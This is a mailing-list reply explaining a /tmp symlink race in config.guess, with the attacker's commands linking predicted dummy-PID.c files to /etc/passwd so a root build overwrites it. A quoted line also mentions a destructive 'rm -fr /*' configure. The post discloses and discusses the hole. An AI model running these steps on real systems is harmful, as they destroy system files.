>Effort to reduce this kind of a security "hole" are quite fruitless, so 
>long as I
>or anyone can build a ./configure that will simply "rm -fr /*";

Please correct me if I'm wrong, but doesn't that again inaccurately assume 
what David pointed out: that the attacker and distributor/provider are the 
same person? If the attacker is not the provider, then there's no way for 
the attacker to get a user to run a configure with "rm -rf /". Yet, if 
config.guess still contains that "hole", then an attacker can still cause 
some damage.

Maybe I should explain my attack again. Attacker sets up symlinks in /tmp 
like this:

attacker$ cd /tmp
attacker$ mkdir package-1.0.0
attacker$ cd package-1.0.0
attacker$ ln -s /etc/passwd dummy-7836.c
attacker$ ln -s /etc/passwd dummy-7837.c
attacker$ ln -s /etc/passwd dummy-7838.c
[....]

Now, the admin downloads package-1.0.0.tar.gz in its original, untampered 
form. Attacker has no way to modify package-1.0.0.tar.gz. But 
package-1.0.0.tar.gz contains the config.guess "hole". Admin builds and 
installs it as follows:

admin$ su -
root# cd /tmp
root# tar zxvf package-1.0.0.tar.gz
root# cd package-1.0.0
root# ./configure
root# make
root# make install

Since configure calls config.guess, which in turn overwrites the dummy-$$.c 
file (if config.guess happens to run as the attacker's predicted PID), 
/etc/passwd is hosed. All this while, attacker does not need to modify 
package-1.0.0.tar.gz to introduce malicious scripts.

This is just one way to perform an attack, and there may be others. I do 
know that Slackware's build scripts use the /tmp directory for building as 
root, so it may be vulnerable to this attack.

Lawrence

--
Lawrence Teo
lcteo at uncc dot edu
http://www.coe.uncc.edu/~lcteo

_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com


Reply via email to